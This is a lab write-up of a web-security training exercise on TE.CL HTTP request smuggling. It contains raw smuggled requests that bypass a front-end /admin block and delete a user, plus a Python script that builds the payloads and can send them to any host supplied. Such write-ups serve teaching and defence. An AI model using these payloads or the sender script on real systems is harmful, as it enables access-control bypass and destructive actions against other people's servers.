Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
Description
This lab involves a front-end and a back-end server. The front-end honours the Transfer-Encoding header, but the back-end doesn't support chunked encoding and falls back to Content-Length, so the two disagree about where each request ends (a TE.CL desync). There's an admin panel at /admin, but the front-end server blocks access to it; the front-end check only ever sees the outer request, so a request smuggled past it reaches /admin on the back-end.
Reproduction and proof of concept
Try to visit /admin and observe that the request is blocked by the front-end.
In Burp Suite, go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked; otherwise Repeater rewrites Content-Length: 4 to match the real body and the desync disappears. Each request below must end with the 0 chunk followed by two CRLF sequences (one empty line after the 0), since the front-end needs the terminating chunk to consider the request complete.
Using Burp Repeater, issue the following request twice. The smuggled request declares Content-Length: 15 but carries only the 3-byte body x=1, so the back-end keeps waiting for body bytes and takes them from the start of the next request on the connection; the response to the second send is the back-end's answer to the smuggled request.
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Observe that the smuggled request to /admin was rejected because it did not carry the header Host: localhost; the back-end only exposes the admin panel to requests that appear to originate locally. Add that header to the smuggled request (the chunk size grows from 0x60 to 0x71 bytes to cover it) and issue the following request twice:
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Observe that you can now access the admin panel. Using the previous response as a reference, change the smuggled request URL to the one that deletes the user carlos, and update the chunk size to 0x87 to match the longer request line:
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

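The hex chunk sizes above (60, 71, 87) are just the byte length of the smuggled request up to and including x=1, and getting them wrong by a byte is the usual reason a TE.CL payload fails. The following script is an added example, not the lab's or PortSwigger's code: it builds the payload from a smuggled request so the chunk size and the outer Content-Length are computed rather than hand-counted, simulates how a Content-Length-only back-end splits the bytes (showing why the second send is needed), and can optionally send the payload twice over TLS. The host name lab-id.web-security-academy.net is a placeholder, and send_twice is my own helper; everything except send_twice runs offline.

```python
"""Build and analyse a TE.CL request-smuggling payload (added example)."""
import socket
import ssl
import sys

CRLF = b"\r\n"

# The three smuggled requests from the write-up, exactly as the back-end sees
# them.  Content-Length: 15 deliberately exceeds the 3-byte body "x=1": the
# back-end waits for the missing bytes and takes them from the next request.
SMUGGLED_ADMIN = (
    b"POST /admin HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n\r\n"
    b"x=1"
)
SMUGGLED_ADMIN_LOCALHOST = (
    b"POST /admin HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n\r\n"
    b"x=1"
)
SMUGGLED_DELETE = (
    b"GET /admin/delete?username=carlos HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n\r\n"
    b"x=1"
)


def chunk_size_hex(smuggled: bytes) -> str:
    """Chunk-size line for the front-end: length of the smuggled bytes in hex."""
    return format(len(smuggled), "x")


def build_te_cl_payload(host: str, smuggled: bytes) -> bytes:
    """Wrap a smuggled request in a TE.CL desync payload.

    Front-end: honours Transfer-Encoding and forwards everything up to 0\\r\\n\\r\\n.
    Back-end:  honours Content-Length, sized to cover only the chunk-size line
               ("60\\r\\n" is 4 bytes), so the smuggled bytes become a new request.
    """
    size_line = chunk_size_hex(smuggled).encode() + CRLF
    head = (
        b"POST / HTTP/1.1" + CRLF
        + b"Host: " + host.encode() + CRLF
        + b"Content-Length: " + str(len(size_line)).encode() + CRLF
        + b"Transfer-Encoding: chunked" + CRLF + CRLF
    )
    # The terminating 0 chunk must be followed by CRLF CRLF or the front-end
    # keeps waiting for more chunks.
    return head + size_line + smuggled + CRLF + b"0" + CRLF + CRLF


def _content_length(raw: bytes) -> int:
    head = raw.partition(CRLF + CRLF)[0]
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            return int(value.strip())
    return 0


def backend_split(payload: bytes) -> tuple:
    """Consume one request the way a Content-Length-only back-end does.

    Returns (request the back-end parsed, bytes left over in the connection),
    the leftover being what it will parse as the *next* request.
    """
    head, _, rest = payload.partition(CRLF + CRLF)
    n = _content_length(payload)
    return head + CRLF + CRLF + rest[:n], rest[n:]


def body_bytes_still_needed(leftover: bytes) -> int:
    """Body bytes the smuggled request is still waiting for (filled by send #2)."""
    body = leftover.partition(CRLF + CRLF)[2]
    return max(_content_length(leftover) - len(body), 0)


def send_twice(host: str, payload: bytes, port: int = 443) -> list:
    """Send the payload twice; the second response answers the smuggled request."""
    responses = []
    ctx = ssl.create_default_context()
    for _ in range(2):
        with socket.create_connection((host, port)) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as s:
                s.sendall(payload)
                s.settimeout(5)
                data = b""
                try:
                    while chunk := s.recv(65536):
                        data += chunk
                except socket.timeout:
                    pass
                responses.append(data)
    return responses


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "lab-id.web-security-academy.net"
    payload = build_te_cl_payload(host, SMUGGLED_DELETE)
    sys.stdout.write(payload.decode())
    if len(sys.argv) > 1:  # only talk to the network when a host is given
        for r in send_twice(host, payload):
            print(r.split(CRLF)[0].decode(errors="replace"))
```

Running it without arguments prints the delete payload with the computed 87 chunk size, which can be pasted into Repeater (remembering the trailing blank line). backend_split shows the back-end stopping after "87\r\n" and holding "GET /admin/delete?username=carlos ..." as the start of the next request; body_bytes_still_needed reports 5 bytes outstanding, which is exactly why the request is issued twice.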
Exploitability
An attacker needs to smuggle an HTTP request past the front-end's /admin block (including the Host: localhost header the back-end expects) to reach the admin panel, then smuggle a second request to delete the user carlos. No credentials are required; the only prerequisite is the TE.CL parsing discrepancy between the two servers.